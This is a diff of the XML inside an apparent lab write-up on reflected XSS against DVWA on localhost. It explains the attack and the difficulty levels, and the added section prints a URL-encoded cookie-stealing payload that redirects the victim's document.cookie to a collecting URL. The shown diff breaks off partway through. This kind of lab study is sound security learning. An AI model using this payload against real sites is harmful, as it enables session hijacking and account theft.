--- a/webHacking/Docx/XSS(Reflected).docx
+++ b/webHacking/Docx/XSS(Reflected).docx
@@ -7,14 +7,12 @@
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
         </w:rPr>
         <w:t>XSS (Cross-Site-Script)</w:t>
       </w:r>
@@ -24,23 +22,21 @@
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
         </w:rPr>
         <w:t xml:space="preserve">Cross-Site-Script </w:t>
       </w:r>
@@ -48,7 +44,6 @@
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
         </w:rPr>
         <w:t>is a potentially fatal attack in which a function not considered by the developer works by inserting script code such as JavaScript into a bulletin board or webmail.</w:t>
       </w:r>
@@ -56,7 +51,6 @@
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
         </w:rPr>
         <w:t xml:space="preserve"> Thus, </w:t>
       </w:r>
@@ -101,60 +95,29 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t xml:space="preserve">xample, if an attacker appends </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a malware </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">on a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>script code</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>, it conducts unintended action, or intercepts an important information of cookie and session token etc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:t>xample, if an attacker appends a malware on a script code, it conducts unintended action, or intercepts an important information of cookie and session token etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -226,23 +189,23 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -287,26 +250,25 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
@@ -361,6 +323,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -438,12 +401,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-      </w:pPr>
       <w:hyperlink r:id="rId7" w:history="1">
         <w:r>
           <w:rPr>
@@ -485,17 +442,15 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -542,121 +497,102 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>f the attacker insert</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the script code in image and photo or send the address of script code to user,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> After the URL is encoded,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it usefully can use</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>f the attacker insert</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the script code in image and photo or send the address of script code to user,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> After the URL is encoded,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">usefully </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>can use</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
         <w:t>&lt;</w:t>
       </w:r>
       <w:r>
@@ -671,14 +607,14 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -783,6 +719,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -942,6 +879,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -1131,13 +1069,7 @@
           <w:rPr>
             <w:rStyle w:val="a3"/>
           </w:rPr>
-          <w:t>http://localhost/dvwa/vulnerabilities/xss_r/?name</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="a3"/>
-          </w:rPr>
-          <w:t>=</w:t>
+          <w:t>http://localhost/dvwa/vulnerabilities/xss_r/?name=</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -1193,17 +1125,15 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -1300,6 +1230,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -1372,11 +1303,70 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>his code also include</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> about script code. Thus, if the attacker use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tag, XSS attack is possible.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1393,23 +1383,7 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>his code also include</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> about script code. Thus, if the attacker use </w:t>
+        <w:t xml:space="preserve">herefore, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1418,7 +1392,7 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>img</w:t>
+        <w:t>high.php</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1427,33 +1401,7 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> tag, XSS attack is possible.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>T</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">herefore, </w:t>
+        <w:t xml:space="preserve"> have the same situation with </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1462,7 +1410,7 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>high.php</w:t>
+        <w:t>medium.php</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1471,24 +1419,6 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> have the same situation with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>medium.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -1521,7 +1451,6 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -1540,6 +1469,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="바탕" w:eastAsia="바탕" w:hAnsi="바탕" w:cs="바탕"/>
+          <w:noProof/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
@@ -1584,20 +1514,1006 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>This code is safe. (XSS Attack is impossible.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:eastAsia="바탕" w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="바탕"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>This code is safe. (XSS Attack is impossible.)</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>Cookie&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId16" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a3"/>
+            <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          </w:rPr>
+          <w:t>http://localhost/dvwa/vulnerabilities/xss_r/?name=&lt;script&gt;document.location%3d'http://localhost/cookie%3f'%2bdocument.cookie&lt;/script</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont" w:hint="eastAsia"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont" w:hint="eastAsia"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3d </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> =</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont" w:hint="eastAsia"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3f </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont" w:hint="eastAsia"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont" w:hint="eastAsia"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2b </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
